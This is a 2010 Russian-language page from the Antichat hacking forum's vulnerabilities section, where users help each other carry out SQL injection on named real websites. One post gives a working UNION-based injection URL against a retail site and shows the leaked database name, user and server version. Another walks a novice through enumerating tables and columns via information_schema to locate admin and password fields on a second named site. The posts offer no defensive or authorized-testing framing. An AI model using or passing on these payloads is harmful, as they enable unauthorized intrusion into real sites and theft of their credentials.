ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11641  
Старый 19.02.2010, 10:49
Аватар для emillord
emillord
Участник форума
Регистрация: 20.01.2008
Сообщений: 284
Провел на форуме:
3767223

Репутация: 408
Отправить сообщение для emillord с помощью ICQ
По умолчанию

Цитата:
где это находиться?
Это отключает вывод ошибок в PHP
Использование:
Код:
<?php error_reporting(0); ?>
Подробнее тут
http://php.net/manual/en/function.error-reporting.php
Совсем подробно вот тут))):
http://tinyurl.com/yane55b
 
Ответить с цитированием

  #11642  
Старый 19.02.2010, 21:25
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

короче ребятки загвоздка вот в чём, не могу придумать как обойти: есть один сайтик, в котором запрос формируется так site.com/catalog_item/156_1_1/ Поманипулировав с параметром 156_1_1 я обнаружил скулю: select * from `dbdrive_catalog_items` where `hid` = "156" order by `ord` limit -20, 20 3. Начал ковыряться дальше вместо 156 поставил 1a5 в надежде, что формирует запрос по знакам _, но не тут то было... получил select * from `dbdrive_catalog_items` where `hid` = "1" order by `ord` limit -20, 20 3. У кого какие мысли??? хотя бы самые отдалённые)
 
Ответить с цитированием

  #11643  
Старый 19.02.2010, 21:29
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

мысль только одна - ссылку в студию
 
Ответить с цитированием

  #11644  
Старый 19.02.2010, 21:35
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Ы_ы
Код:
http://www.megatop.by/catalog_item/106_417_1/
 
Ответить с цитированием

  #11645  
Старый 19.02.2010, 21:40
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Неа...
 
Ответить с цитированием

  #11646  
Старый 19.02.2010, 21:44
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Инъекция в LIMIT'e, да еще и регулярка RewriteRule только числовые значения принимает.
 
Ответить с цитированием

  #11647  
Старый 19.02.2010, 21:44
Аватар для walter
walter
Постоянный
Регистрация: 29.01.2010
Сообщений: 958
Провел на форуме:
3078314

Репутация: 382


По умолчанию

Цитата:
Сообщение от _iks_  
В начало скрипта добавить надо, вроде
Там пустое место , не индификация
 
Ответить с цитированием

  #11648  
Старый 19.02.2010, 21:56
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Вот держи рабочую.
Цитата:
http://www.megatop.by/catalog/women/Polusapogi/sezon=Зима')+as+kod+from+dbdrive_catalog_items +union+select+concat_ws(0x3a,database(),user(),ver sion()),222--+
Цитата:
<option value="222">axismoda_megatop:axismoda_megatop@loca lhost:5.0.86-percona-highperf-b19</option>
 
Ответить с цитированием

  #11649  
Старый 20.02.2010, 01:12
Аватар для Darren
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183

Репутация: 13
Отправить сообщение для Darren с помощью ICQ
По умолчанию

я подобрал колличество строк
http://xxxx/page.php?form_id=75%20union%20select%20+1,2,3,4,5% 20from%20pl_menu_page

теперь выяснил что существует строка под названием id
http:/xxxx/page.php?form_id=75%20union%20select%20+1,2,id,4,5 %20from%20pl_menu_page

не могу найти название остальных строк, (user,users,admin методом перебора ничего не дало) каковы мои действия дальше?
Очень хочу разобраться, help please

Последний раз редактировалось Darren; 20.02.2010 в 10:16..
 
Ответить с цитированием

  #11650  
Старый 20.02.2010, 02:03
Аватар для [Feldmarschall]
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от Darren  
Всем привет, хочу научиться скулю, ногами сильно не пинать
Цитата:
http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,version%28%29+from+informa tion_schema.tables--
5.0.51a пятая версия..

Цитата:
http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,table_name+from+informatio n_schema.tables+limit+0,1--
id = CHARACTER_SETS

Цитата:
http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,column_name+from+informati on_schema.columns+limit+0,1--

id = CHARACTER_SET_NAME


Меняй LIMIT+1,1..2,1 итд и дойдешь до нужного столбца типа (admin,passwd,name,user итп)

Последний раз редактировалось [Feldmarschall]; 20.02.2010 в 02:08..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ